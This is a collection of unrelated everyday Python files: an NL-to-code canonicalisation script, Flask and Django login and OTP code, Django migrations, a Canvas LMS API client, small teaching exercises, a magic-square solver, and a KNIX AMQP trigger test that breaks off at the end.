    # sum of part lengths -- sanity check that no query was dropped
    pl_sum = 0
    for part in parts:
        pl_sum = pl_sum + len(part)
    assert (len(queries) == pl_sum)
    # Do parsing for every batch
    # NOTE(review): shadows the module-level qparser with a fresh instance.
    qparser = QueryParser()
    result = []
    for part in parts:
        print "Parsing queries ", parts.index(part) * n, " Onwards - ", len(queries)
        result = result + qparser.deep_phrases(part)
    assert (len(result) == len(queries))
    return result
def tag_pos(queries):
    """Return only the POS component (second element) of each parsed query.

    Python 2: map() returns a list here; callers call len() on the result.
    """
    phrase_pos = batch_deep_phrases(queries)
    assert (len(phrase_pos) == len(queries))
    # get pos alone
    tok_pos = map(lambda ppos: ppos[1], phrase_pos)
    return tok_pos
# unnormalize numbers
def unnormalize_numbers(reftypes_queries):
ref_types = []
for ref_type, query in reftypes_queries:
for k, v in ref_type[1].iteritems():
if v not in query and v.startswith(TYPES["num"]):
ref_type[1][k] = k
ref_types.append(ref_type)
assert (len(ref_types) == len(reftypes_queries))
return ref_types
def canonicalize_bunch(queries, codes):
    """Canonicalize parallel lists of NL queries and code snippets.

    Returns (ref_types, canon_queries, canon_codes), all parallel to the
    inputs. Python 2 only: the multi-iterable map() calls below both consume
    and reuse `ref_types`/`id_queries_codes` as lists, which would break
    under Python 3's iterator-returning map.
    """
    assert (len(queries) == len(codes))
    # assign ids to queries, codes for tracking
    id_queries_codes = [ (i, queries[i], codes[i]) for i in range(len(queries)) ]
    # get all ref types
    ref_types = map(lambda d: (d[0], guess_types(d[2], d[1])), id_queries_codes)
    # Canonicalizeing all queries; direct mapping part 1
    id_queries_codes = map(lambda ref_type, d: (d[0], \
                           canonicalize_query_part1(d[1], ref_type[1]),\
                           d[2]), ref_types, id_queries_codes)
    # batch process all queries for pos after canonicalization part 1
    canon_p1_queries = map(lambda d: d[1], id_queries_codes)
    id_qpos = tag_pos(canon_p1_queries)
    # update id_queries_codes
    id_queries_codes = map(lambda qpos, d: (d[0], qpos, d[2]), id_qpos, id_queries_codes)
    # Canonicalize all queries; pos_info part 2
    id_queries_codes = map(lambda ref_type, d: (d[0], \
                           canonicalize_query_part2(d[1], ref_type[1]), \
                           d[2]), ref_types, id_queries_codes)
    # change in reftypes; ugly;
    canon_p2_queries = map(lambda d: d[1], id_queries_codes)
    assert (len(canon_p2_queries) == len(ref_types))
    # if something is a number and does not appear in the query; leave it alone
    ref_types = unnormalize_numbers(zip(ref_types, canon_p2_queries))
    # finally canonicalize code
    id_queries_codes = map(lambda ref_type, d: (d[0], d[1], canonicalize_code(d[2], ref_type[1])), \
                           ref_types, id_queries_codes)
    # get canonicalized queries
    canon_queries = map(lambda d: d[1], id_queries_codes)
    canon_codes = map(lambda d: d[2], id_queries_codes)
    ref_types = map(lambda rt: rt[1], ref_types)
    return ref_types, canon_queries, canon_codes
## Main ########################################################################
if __name__ == '__main__':
    # Load the parallel annotation/code corpus, then keep only snippets that
    # survive parse + regenerate + parse (Python 2: map/filter return lists).
    queries, codes = fetch_queries_codes(ANNOT, CODE)
    queries_codes = zip(queries, codes)
    queries_codes = map(lambda q_c: (q_c[0], parsable_code(q_c[1])), queries_codes)
    queries_codes = map(lambda q_c: (q_c[0], reproducable_code(q_c[1])), queries_codes)
    queries_codes = map(lambda q_c: (q_c[0], parsable_code(q_c[1])), queries_codes)
    queries_codes = filter(lambda q_c: q_c[1] != "", queries_codes)
    queries, codes = zip(*queries_codes)
    #give_me_5(queries, "queries")
    #give_me_5(codes, "codes")
    # have only 5 -- actually slices a single example (index 4) for eyeballing
    queries = queries[4:5]
    codes = codes[4:5]
    assert (len(queries) == len(codes))
    ref_types, canon_queries, canon_codes = canonicalize_bunch(queries, codes)
    assert (len(queries) == len(codes))
    n = len(queries)
    # Interactive review loop: show original vs canonicalized, wait for Enter.
    for idx in range(0, n):
        q = queries[idx]
        c = codes[idx]
        cq = canon_queries[idx]
        cc = canon_codes[idx]
        print "-" * 60
        print "\n"
        print "index - ", idx
        print "\n"
        print "QUERY - "
        print "\n"
        print q
        print "\n"
        print cq
        print "\n"
        print "CODE - "
        print "\n"
        print c
        print "\n"
        print cc
        print "\n"
        x = raw_input()
|
from datetime import datetime, timedelta
from faker import Faker
from flask_wtf import FlaskForm
from flask import session
import wtforms as forms
from db import mongo
from schemas import UserSchema
class EmailForm(FlaskForm):
    """Email step of passwordless login: validate the address, stash the user,
    and issue a short-lived one-time code."""

    email = forms.StringField('Email Address')

    def validate_email(form, field):
        # Syntactic validation first; raises ValidationError on bad format.
        syntax_check = forms.validators.Email(
            message='That\'s not a valid email address.'
        )
        syntax_check(form, field)
        user = mongo.db.users.find_one({'email': field.data})
        if user is None:
            raise forms.ValidationError(
                f'User with email {field.data} not found'
            )
        session['user_json'] = UserSchema().dumps(user)

    def send_enter_code(self):
        # Generate a 6-digit one-time code and persist it in the session
        # with a 10-minute TTL and a 1-minute resend block.
        code = Faker().numerify('######')
        print(f'\nenter_code: {code}\n')
        session['enter_code'] = code
        session['enter_code_ttl'] = datetime.now() + timedelta(minutes=10)
        session['enter_code_block_expired_at'] = (
            datetime.now() + timedelta(minutes=1)
        )
class LogInByCodeForm(FlaskForm):
    """Second login step: check the one-time code kept in the session."""

    enter_code = forms.StringField('Enter Code')

    def validate_enter_code(form, field):
        # Reject expired codes first, then mismatching ones.
        if datetime.now() > session['enter_code_ttl']:
            raise forms.ValidationError('Enter code is stale')
        if field.data != session['enter_code']:
            raise forms.ValidationError('Wrong enter code')

    def clean_session_data(self):
        # Drop every code-related key once login succeeds.
        for key in ('enter_code', 'enter_code_ttl', 'enter_code_block_expired_at'):
            del session[key]
|
# Generated by Django 3.2.5 on 2021-07-18 22:25
from django.db import migrations
class Migration(migrations.Migration):
    # Fixes the typo'd field name on Presence: is_insterested -> is_interested.

    dependencies = [
        ('events', '0005_alter_presence_unique_together'),
    ]

    operations = [
        migrations.RenameField(
            model_name='presence',
            old_name='is_insterested',
            new_name='is_interested',
        ),
    ]
|
from flask import session
import requests
BASE_PARAMS = {'per_page': '50'}
CANVAS_DOMAIN = "usu.instructure.com"
def courses(token, id='15', more_pages_URI=None, term=None, deleted=None):
    """Fetch one page of courses for a Canvas account.

    parameters should be entered as type str.

    NOTE(review): the return shape is inconsistent -- a 5-tuple
    (json, more_pages_URI, first, last, per_page) on most paths, but a bare
    json list (or an error-message string inside a 5-tuple) otherwise;
    confirm what callers expect before touching the control flow.
    """
    rh = {"Authorization": "Bearer %s" % token}
    # Shadows the module-level BASE_PARAMS with a fresh local copy.
    BASE_PARAMS = {'per_page': '50'}
    per_page = int(BASE_PARAMS['per_page'])
    # If term is used as a parameter, add it to parameters
    if term:
        BASE_PARAMS['enrollment_term_id'] = term
    # If the user only wants to see deleted pages, add to parameters
    if deleted:
        BASE_PARAMS['state[]'] = 'deleted'
    else:
        BASE_PARAMS['state[]'] = 'all'
    if more_pages_URI:
        # Follow a pagination link verbatim (its params are already embedded).
        URI = more_pages_URI
        data = requests.get(URI, headers=rh)
    else:
        endpoint = '/api/v1/accounts/%s/courses'
        BASE_PARAMS['include[]'] = ['teachers', 'total_students', 'term', 'syllabus_body']
        BASE_DOMAIN = "https://%s" % CANVAS_DOMAIN
        URI = BASE_DOMAIN + (endpoint % id)
        data = requests.get(URI, headers=rh, params=BASE_PARAMS)
    json_data = data.json()
    # A 'prev' link in the Link header means this is not the first page.
    if 'prev' in data.links.keys():
        session['PREVIOUS_PAGE'] = data.links['prev']['url']
        first = False
    else:
        first = True
    # If the number of courses we get is less than the number that we want,
    # this page is the last page.
    desiredItems = int(BASE_PARAMS['per_page'])
    if len(json_data) >= desiredItems:
        if 'next' in data.links:
            session['NEXT_PAGE'] = data.links['next']['url']
            last = False
        else:
            last = True
    else:
        last = True
    if more_pages_URI or first or last:
        return json_data, more_pages_URI, first, last, per_page
    else:
        if 'errors' in json_data:
            return json_data['errors'][0]['message'], more_pages_URI, first, last, per_page
        else:
            return json_data
def subaccounts(token, id='15', optional_base_params=None):
    """Fetch the sub-accounts of a Canvas account.

    arguments should be entered as type str. Returns the decoded JSON on
    success, or the first error message string on failure.

    Bug fix: the original assigned BASE_PARAMS only inside the `if` branch,
    which made BASE_PARAMS a local name for the whole function body and
    raised UnboundLocalError whenever optional_base_params was not supplied.
    Use a separate local that falls back to the module-level defaults.
    """
    params = optional_base_params if optional_base_params else BASE_PARAMS
    endpoint = '/api/v1/accounts/%s/sub_accounts'
    rh = {"Authorization": "Bearer %s" % token}
    BASE_DOMAIN = "https://%s" % CANVAS_DOMAIN
    URI = BASE_DOMAIN + (endpoint % id)
    data = requests.get(URI, headers=rh, params=params).json()
    if 'errors' in data:
        return data['errors'][0]['message']
    else:
        return data
def test_status(token, id='15'):
    """Probe the account scopes endpoint to check the token, then redirect
    to the page matching the HTTP status (or return a plain error string)."""
    from flask import redirect, url_for
    rh = {"Authorization": "Bearer %s" % token}
    BASE_DOMAIN = "https://%s" % CANVAS_DOMAIN
    URI = BASE_DOMAIN + ('/api/v1/accounts/%s/scopes' % id)
    data = requests.get(URI, headers=rh, params=BASE_PARAMS)
    # Test to get results of test: status code -> view name.
    status_views = {
        400: 'bad_request',
        401: 'unauthorized',
        404: 'not_found',
        200: 'courses',
    }
    view_name = status_views.get(data.status_code)
    if view_name is not None:
        return redirect(url_for(view_name))
    return 'Unknown error occurred. <br> Please contact USU Center for Student Analytics at https://ais.usu.edu/analytics/'
def course_enrollments(token, id):
    """Return the enrollments of course `id`, or the first error message."""
    headers = {"Authorization": "Bearer %s" % token}
    url = ("https://%s" % CANVAS_DOMAIN) + ('/api/v1/courses/%s/enrollments' % id)
    payload = requests.get(url, headers=headers, params=BASE_PARAMS).json()
    if 'errors' in payload:
        return payload['errors'][0]['message']
    return payload
# def students_enrolled_in_course(token, id):
# endpoint = '/api/v1/courses/%s/students'
# rh = {"Authorization": "Bearer %s" % token}
# BASE_DOMAIN = "https://%s" % CANVAS_DOMAIN
# endpoint_complete = endpoint % id
# URI = BASE_DOMAIN + endpoint_complete
# data = requests.get(URI, headers=rh, params=BASE_PARAMS).json()
# if 'errors' in data:
# return data['errors'][0]['message']
# else:
# return data
def enrollment_terms(token):
    """Return the enrollment terms of the root account (hard-coded id 15),
    or the first error message string."""
    id = 15
    headers = {"Authorization": "Bearer %s" % token}
    url = ("https://%s" % CANVAS_DOMAIN) + ('/api/v1/accounts/%s/terms' % id)
    payload = requests.get(url, headers=headers, params=BASE_PARAMS).json()
    if 'errors' in payload:
        return payload['errors'][0]['message']
    return payload
def get_assignments(token, id):
    """Return up to 100 assignments of course `id`, or an error message.

    Bug fix: the original mutated the module-level BASE_PARAMS dict
    (BASE_PARAMS['per_page'] = '100'), silently changing the page size for
    every later request made through this module. Use a per-call copy.
    """
    params = dict(BASE_PARAMS)
    params['per_page'] = '100'  # TODO: loop through pagination instead of one big page
    rh = {"Authorization": "Bearer %s" % token}
    BASE_DOMAIN = "https://%s" % CANVAS_DOMAIN
    URI = BASE_DOMAIN + ('/api/v1/courses/%s/assignments' % id)
    data = requests.get(URI, headers=rh, params=params).json()
    if 'errors' in data:
        return data['errors'][0]['message']
    else:
        return data
|
import requests

# Smoke-test the local video service: POST one job and print the outcome.
r = requests.post("http://0.0.0.0:5000/", json={'ID':'10200','FPS':'2','duration':'40','lang':'hindi'})
print(r.status_code, r.reason)
print(r.text)
# Stdlib-only alternative kept for reference:
# from urllib.parse import urlencode
# from urllib.request import Request, urlopen
# url = 'http://0.0.0.0:5000/' # Set destination URL here
# post_fields = {'ID': '12345'} # Set POST fields here
# request = Request(url, urlencode(post_fields).encode())
# json = urlopen(request).read().decode()
# print(json)
# Include fps and duration on req
|
from django.conf import settings
from django.contrib.auth import authenticate, login as auth_login, logout as auth_logout
from django.contrib.auth.decorators import login_required
from django.core.mail import EmailMultiAlternatives
from django.core.urlresolvers import reverse
from django.http import Http404, HttpResponse, JsonResponse
from django.shortcuts import render, redirect, get_object_or_404
from django.template import loader
from django.views.decorators.csrf import csrf_exempt
from django.views.decorators.http import require_GET, require_POST, require_http_methods

from .forms import LoginForm, ForgotPassword, SetPassword, SignupForm
from .models import MyUser, create_otp, get_valid_otp_object
# Create your views here.
#@required_login set a get parameter next in the url
def hello(request):
    """Debug view: dump the request (and the optional ?abc= parameter) to
    stdout and reply with a static greeting."""
    print(request)
    print(request.GET.get('abc', ''))
    return HttpResponse('<h1>Hello</h1>')
'''
@require_GET
def show_login(request):
if request.user.is_authenticated():
return redirect(reverse('home',kwargs={'id':user.id}));
return render(request,'account/auth/login.html');
'''
@require_http_methods(['GET','POST'])
def login(request):
    """Render the login form on GET; authenticate and redirect on POST."""
    if request.user.is_authenticated():
        return redirect(reverse('home', kwargs={'id': request.user.id}))
    if request.method == 'GET':
        return render(request, 'account/auth/login.html', {'f': LoginForm()})
    form = LoginForm(request.POST)
    if not form.is_valid():
        return render(request, 'account/auth/login.html', {'f': form})
    # The form exposes the user it authenticated during validation.
    auth_login(request, form.authenticated_user)
    return redirect(reverse('home', kwargs={'id': form.authenticated_user.id}))
def forgot_password(request):
    """Email a password-reset OTP to the address of the given username."""
    if request.user.is_authenticated():
        return redirect(reverse('home', kwargs={'id': request.user.id}))
    if request.method == 'GET':
        return render(request, 'account/auth/forgot_password.html', {'f': ForgotPassword()})
    form = ForgotPassword(request.POST)
    if not form.is_valid():
        return render(request, 'account/auth/forgot_password.html', {'f': form})
    user = MyUser.objects.get(username=form.cleaned_data['username'])
    otp = create_otp(user=user, purpose='FP')
    # Render the plain-text reset email and send it to the account address.
    body = loader.render_to_string('account/auth/email/forgot_password.txt', {'u': user, 'otp': otp})
    message = EmailMultiAlternatives("Reset Password", body, settings.EMAIL_HOST_USER, [user.email])
    message.send()
    return render(request, 'account/auth/forgot_email_sent.html', {'u': user})
def reset_password(request, id=None, otp=None):
    """Validate a reset OTP for user `id` and let them choose a new password."""
    if request.user.is_authenticated():
        return redirect(reverse('home', kwargs={'id': request.user.id}))
    user = get_object_or_404(MyUser, id=id)
    otp_object = get_valid_otp_object(user=user, purpose='FP', otp=otp)
    if not otp_object:
        raise Http404()
    if request.method == 'GET':
        context = {'f': SetPassword(), 'otp': otp_object.otp, 'uid': user.id}
        return render(request, 'account/auth/set_password.html', context)
    form = SetPassword(request.POST)
    if form.is_valid():
        user.set_password(form.cleaned_data['new_password'])
        user.save()
        # One-shot token: consume the OTP after a successful reset.
        otp_object.delete()
        return render(request, 'account/auth/set_password_success.html', {'u': user})
    context = {'f': form, 'otp': otp_object.otp, 'uid': user.id}
    return render(request, 'account/auth/set_password.html', context)
@require_GET
@login_required
def home(request, id):
    """Logged-in landing page; access is enforced by @login_required."""
    return render(request, 'account/auth/loggedin.html')
def logout(request):
    """End the current session and bounce back to the login page."""
    auth_logout(request)
    return redirect(reverse('login'))
def signup(request):
    """Register a new (inactive) user and email an activation OTP link."""
    if request.user.is_authenticated():
        return redirect(reverse('home', kwargs={'id': request.user.id}))
    if request.method == 'GET':
        return render(request, 'account/auth/signup.html', {'f': SignupForm()})
    form = SignupForm(request.POST)
    if not form.is_valid():
        return render(request, 'account/auth/signup.html', {'f': form})
    # Keep the account inactive until the emailed activation link is used.
    user = form.save(commit=False)
    user.set_password(form.cleaned_data['password'])
    user.is_active = False
    user.save()
    otp = create_otp(user=user, purpose='AA')
    body = loader.render_to_string('account/auth/email/activation_link.txt', {'u': user, 'otp': otp})
    message = EmailMultiAlternatives("Activation Link", body, settings.EMAIL_HOST_USER, [user.email])
    message.send()
    return render(request, 'account/auth/activation_link_sent.html', {'u': user})
# Activate Account
@require_GET
def activate(request, id=None, otp=None):
    """Flip a user to active when the emailed activation OTP checks out."""
    user = get_object_or_404(MyUser, id=id)
    otp_object = get_valid_otp_object(user=user, purpose='AA', otp=otp)
    if not otp_object:
        raise Http404()
    user.is_active = True
    user.save()
    # One-shot token: consume the OTP after successful activation.
    otp_object.delete()
    return render(request, 'account/auth/activation_successful.html', {'u': user})
|
import turtle as t

t.shape("turtle")
t.penup()
t.pendown()
# Trace a regular hexagon: six equal sides with 60-degree left turns.
for _ in range(6):
    t.forward(100)
    t.left(60)
t.done()
|
import os
def hello_world():
    """Print the Claython greeting banner."""
    print("-------> CLAYTHON SAYS ------ HELLO")


if __name__ == "__main__":
    hello_world()
|
'''korean_dict_parser_type_1.py
Korean dictionary parser for type 1 text files
'''
import json
from word_functions import (
strip_and_sub_using_regex,
generate_korean_dictionary_type_1,
)
INPUT_FILE = "../txt/6000_p1.txt"
OUTPUT_FILE = "../json/korean_dict_6000_part_1.json"
def main():
    """Read the raw Korean word list, build the dictionary, dump it as JSON."""
    # Read korean word file
    print(f"Reading {INPUT_FILE}\n")
    with open(INPUT_FILE, 'r') as file:
        raw_content = file.readlines()
    k_dict = generate_korean_dictionary_type_1(raw_content)
    # Write to file
    with open(OUTPUT_FILE, "w") as file:
        json.dump(k_dict, file)
    # NOTE(review): the summary is a triple-quoted f-string, so its internal
    # line layout is part of the printed output -- do not re-indent it.
    print(F'''
Completed writing to {OUTPUT_FILE}
Total words written to file: {len(k_dict)}
''')


if __name__ == '__main__':
    main()
|
# Generated by Django 2.2 on 2019-10-28 01:13
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
    # Initial schema for the userhandling app: movie-night domain models
    # (Location, Movie, MovieNightEvent, Topping), attendance/voting join
    # tables, and per-user Profile / PasswordReset bookkeeping.

    initial = True

    dependencies = [
        migrations.swappable_dependency(settings.AUTH_USER_MODEL),
    ]

    operations = [
        migrations.CreateModel(
            name='Location',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('name', models.CharField(max_length=200)),
                ('street', models.CharField(max_length=200)),
                ('zip_code', models.CharField(max_length=200)),
                ('city', models.CharField(max_length=200)),
                ('state', models.CharField(max_length=200)),
                ('country', models.CharField(max_length=200)),
            ],
        ),
        migrations.CreateModel(
            name='Movie',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('tmdbID', models.CharField(max_length=200)),
                ('title', models.CharField(max_length=500)),
                ('year', models.CharField(max_length=4)),
                ('director', models.CharField(max_length=500)),
                ('producer', models.CharField(max_length=500)),
                ('runtime', models.CharField(max_length=10)),
                ('actors', models.CharField(max_length=500)),
                ('plot', models.TextField(max_length=2000)),
                ('country', models.CharField(max_length=500)),
                ('posterpath', models.CharField(max_length=100)),
                ('trailerlink', models.CharField(max_length=200)),
                ('on_netflix', models.BooleanField(default=False)),
                ('netflix_link', models.TextField(blank=True)),
                ('on_amazon', models.BooleanField(default=False)),
                ('amazon_link', models.TextField(blank=True)),
            ],
        ),
        migrations.CreateModel(
            name='MovieNightEvent',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('motto', models.CharField(max_length=200)),
                ('description', models.TextField(max_length=10000)),
                ('date', models.DateTimeField(verbose_name='date published')),
                ('isdraft', models.BooleanField(default=True)),
                ('isdeactivated', models.BooleanField(default=False)),
                ('MaxAttendence', models.IntegerField(default=25)),
                ('MovieList', models.ManyToManyField(blank=True, to='userhandling.Movie')),
                ('location', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='userhandling.Location')),
            ],
        ),
        migrations.CreateModel(
            name='PasswordReset',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('username', models.CharField(blank=True, max_length=30)),
                ('created_at', models.DateTimeField(auto_now_add=True)),
                ('reset_key', models.CharField(blank=True, max_length=40)),
                ('reset_used', models.BooleanField(default=False)),
            ],
        ),
        migrations.CreateModel(
            name='Topping',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('topping', models.CharField(max_length=300)),
            ],
        ),
        # Join table: which user attends which movie night.
        migrations.CreateModel(
            name='UserAttendence',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('registered_at', models.DateTimeField(auto_now_add=True)),
                ('registration_complete', models.BooleanField(default=False)),
                ('movienight', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='userhandling.MovieNightEvent')),
                ('user', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
            ],
        ),
        migrations.CreateModel(
            name='VotingParameters',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('vote_disable_before', models.DurationField()),
                ('reminder_email_before', models.DurationField()),
                ('initial_email_after', models.DurationField()),
            ],
        ),
        # A single attendee's preference score for one movie.
        migrations.CreateModel(
            name='VotePreference',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('preference', models.IntegerField(blank=True)),
                ('movie', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='userhandling.Movie')),
                ('user_attendence', models.ForeignKey(blank=True, on_delete=django.db.models.deletion.CASCADE, to='userhandling.UserAttendence')),
            ],
        ),
        migrations.CreateModel(
            name='Profile',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('bio', models.TextField(blank=True, max_length=500)),
                ('email_buffer', models.EmailField(default='', max_length=254)),
                ('location', models.CharField(blank=True, max_length=30)),
                ('birth_date', models.DateField(blank=True, null=True)),
                ('activation_key', models.CharField(blank=True, max_length=40)),
                ('key_expires', models.DateTimeField(blank=True, null=True)),
                ('user', models.OneToOneField(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
            ],
        ),
        migrations.CreateModel(
            name='MovienightTopping',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('topping', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='userhandling.Topping')),
                ('user_attendence', models.ForeignKey(blank=True, on_delete=django.db.models.deletion.CASCADE, to='userhandling.UserAttendence')),
            ],
        ),
    ]
|
#map- Function
def triple(x):
    """Return x scaled by 3."""
    return x * 3


def triplesuffle(y):
    """Return a new list with every element of y tripled (via map)."""
    return list(map(triple, y))


v = [1, 2, 3]
z = triplesuffle(v)
print(z)
#map- Lambda
def five(value):
    """Return a new list with every element of value multiplied by 5."""
    return [5 * item for item in value]


b = [8, 9, 10]
n = five(b)
print(n)
# Build a list holding the upper-case version of each abbreviation.
abbrevs = ["usa", "esp", "chn", "jpn", "mex", "can", "rus", "rsa", "jam"]
l = [c.upper() for c in abbrevs]
abbrevs_upper = list(l)
print(abbrevs_upper)

# Same, but keeping only the first two letters of each abbreviation.
abbrevs = ["usa", "esp", "chn", "jpn", "mex", "can", "rus", "rsa", "jam"]
l = [c[:2].upper() for c in abbrevs]
abbrevs_upper = list(l)
print(abbrevs_upper)


# Same as the first example, but going through a named function.
def tnsfr(x):
    """Return x upper-cased."""
    return x.upper()


abbrevs = ["usa", "esp", "chn", "jpn", "mex", "can", "rus", "rsa", "jam"]
new = [tnsfr(a) for a in abbrevs]
y = list(new)
print(y)
|
"""
Solve the sudoko which is a 3*3 matrix, the sum of each row and each column and diagonal
of the matrix is 15. Function sudoko2 seems better for it only caculate the rows once.
"""
from itertools import permutations
def sudoko():
    """Print every 3x3 arrangement of 1..9 whose rows, columns and both
    diagonals sum to 15 -- i.e. brute-force all 9! permutations."""
    found = []
    for perm in permutations([1, 2, 3, 4, 5, 6, 7, 8, 9]):
        grid = [perm[:3], perm[3:6], perm[6:]]
        # Short-circuit: rows first, then columns, then the two diagonals.
        if all(sum(row) == 15 for row in grid) \
                and all(sum(col) == 15 for col in zip(*grid)) \
                and grid[0][0] + grid[1][1] + grid[2][2] == grid[0][2] + grid[1][1] + grid[2][0] == 15:
            found.append(grid)
    for grid in found:
        for row in grid:
            print(row)
        print('*' * 20)
def sudoko2():
    """Same output as sudoko(), but faster: first enumerate the ordered
    triples that sum to 15, then combine three disjoint ones into squares."""
    rows15 = [p for p in permutations([1, 2, 3, 4, 5, 6, 7, 8, 9], 3) if sum(p) == 15]
    found = []
    for candidate in permutations(rows15, 3):
        # The three rows must use each of 1..9 exactly once.
        if len(set(num for row in candidate for num in row)) != 9:
            continue
        if all(sum(col) == 15 for col in zip(*candidate)) \
                and candidate[0][0] + candidate[1][1] + candidate[2][2] == candidate[0][2] + candidate[1][1] + candidate[2][0] == 15:
            found.append(candidate)
    for square in found:
        for row in square:
            print(row)
        print('*' * 20)
# sudoko()
# sudoko2()
# The time sudoko takes is 3 times of which sudoko2 takes. |
# Generated by Django 3.1.7 on 2021-03-28 07:31
import datetime
from django.db import migrations, models
from django.utils.timezone import utc
class Migration(migrations.Migration):
    # Auto-generated: re-bakes the (migration-time) default timestamps on the
    # `date` fields of Comments and Feed.

    dependencies = [
        ('home', '0004_auto_20210328_1256'),
    ]

    operations = [
        migrations.AlterField(
            model_name='comments',
            name='date',
            field=models.DateField(blank=True, default=datetime.datetime(2021, 3, 28, 7, 31, 29, 751307, tzinfo=utc), null=True),
        ),
        migrations.AlterField(
            model_name='feed',
            name='date',
            field=models.DateField(blank=True, default=datetime.datetime(2021, 3, 28, 7, 31, 29, 750311, tzinfo=utc), null=True),
        ),
    ]
|
# -*- coding: utf-8 -*-
# @Author :AI悦创
# @DateTime :2019/9/15 11:31
# @FileName :判断是否为整数插件.PY
# @Function :功能
# Development_tool :PyCharm
# <-------import data-------------->
# def isinstance_int(start_pn_num, end_pn_sum):
def isinstance_int(target):
    """Print whether target is an int or a float; silent for other types."""
    label = None
    if isinstance(target, int):
        label = '整数'
    elif isinstance(target, float):
        label = '浮点数'
    if label is not None:
        print(label)


if __name__ == '__main__':
    isinstance_int(30)
# Copyright 2020 The KNIX Authors
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import json
import random
import sys
import time
import unittest
import socket
import os
import subprocess
sys.path.append("../")
from mfn_test_utils import MFNTest
# Start a local rabbitmq broker and a publisher before the test class runs.
# The fixed sleeps give the processes time to come up — TODO confirm timing
# is sufficient on slow CI hosts.
print("Starting rabbitmq")
rabbit = subprocess.Popen(["scripts/run_local_rabbitmq.sh"])
time.sleep(20)
print("Starting publisher")
pub = subprocess.Popen(["scripts/run_local_publisher.sh"])
time.sleep(10)
# Subscriber script is run synchronously (blocks until it finishes).
os.system("scripts/run_local_subscriber.sh")
print("Publisher is ready")
class TriggersAmqpTest(unittest.TestCase):
    """End-to-end test for AMQP-based workflow triggers.

    Relies on the module-level `rabbit` and `pub` subprocesses started at
    import time. Deploys a workflow, counts trigger start/error markers in
    its logs, then kills the broker and verifies exactly one error is
    propagated for the second state.
    """

    # @unittest.skip("")
    def test_triggers_storage(self):
        test = MFNTest(test_name='triggers_amqp',
                       workflow_filename='wf_triggers_amqp.json')
        time.sleep(5)
        print("Executing test")
        # Unique per-run marker so this run's log lines can be told apart.
        nonce = str(int(time.time() * 1000))
        curr_hostname = socket.gethostname()
        input_data = []
        workflowname = "wf_triggers_amqp"
        routingkey_to_expect = "rabbit.routing.key"
        routingkey = "rabbit.*.*"
        input_data.append(workflowname)
        input_data.append(nonce)
        input_data.append("amqp://rabbituser:rabbitpass@" + curr_hostname + ":5672/%2frabbitvhost")
        input_data.append(routingkey)
        input_data.append("egress_exchange")
        response = test.execute(input_data)
        time.sleep(2)
        counter_state_1 = 0
        counter_state_2 = 0
        counter_state_1_error = 0
        counter_state_2_error = 0
        logs = test.get_workflow_logs()
        wflog = logs["log"]
        log_lines = wflog.split("\n")
        # Count start/error markers for both states while the broker is up.
        for line in log_lines:
            if "_!_TRIGGER_START_" + nonce + ";triggers_amqp;" + workflowname + ";" + routingkey_to_expect + ";" in line.strip():
                counter_state_1 = counter_state_1 + 1
                print(line.strip())
            if "_!_TRIGGER_ERROR_" + nonce + ";triggers_amqp;" + workflowname + ";;" in line.strip():
                counter_state_1_error = counter_state_1_error + 1
                print(line.strip())
            if "_!_TRIGGER_START_" + nonce + ";triggers_amqp_state2;" + workflowname + ";" + routingkey_to_expect + ";" in line.strip():
                counter_state_2 = counter_state_2 + 1
                print(line.strip())
            if "_!_TRIGGER_ERROR_" + nonce + ";triggers_amqp_state2;" + workflowname + ";;" in line.strip():
                counter_state_2_error = counter_state_2_error + 1
                print(line.strip())
        print("Force stopping AMQP broker and checking for error message propagation")
        pub.terminate()
        rabbit.terminate()
        subprocess.Popen(["scripts/stop_local_rabbitmq.sh"])
        time.sleep(20)
        logs = test.get_workflow_logs()
        wflog = logs["log"]
        log_lines = wflog.split("\n")
        # After the broker is gone, only error markers are expected.
        for line in log_lines:
            if "_!_TRIGGER_ERROR_" + nonce + ";triggers_amqp;" + workflowname + ";;" in line.strip():
                counter_state_1_error = counter_state_1_error + 1
                print(line.strip())
            if "_!_TRIGGER_ERROR_" + nonce + ";triggers_amqp_state2;" + workflowname + ";;" in line.strip():
                counter_state_2_error = counter_state_2_error + 1
                print(line.strip())
        # Pass criteria: >=2 state1 starts, >=4 state2 starts, no state1
        # errors, exactly one state2 error (caused by stopping the broker).
        if counter_state_1 >= 2 and counter_state_2 >= 4 and counter_state_1_error == 0 and counter_state_2_error == 1:
            print("Number of state1 triggers: " + str(counter_state_1))
            print("Number of state2 triggers: " + str(counter_state_2))
            print("Number of state1 error triggers: " + str(counter_state_1_error))
            # Bug fix: this label previously said "state1" for the state2 counter.
            print("Number of state2 error triggers: " + str(counter_state_2_error))
            test.report(True, str(input_data), input_data, response)
        else:
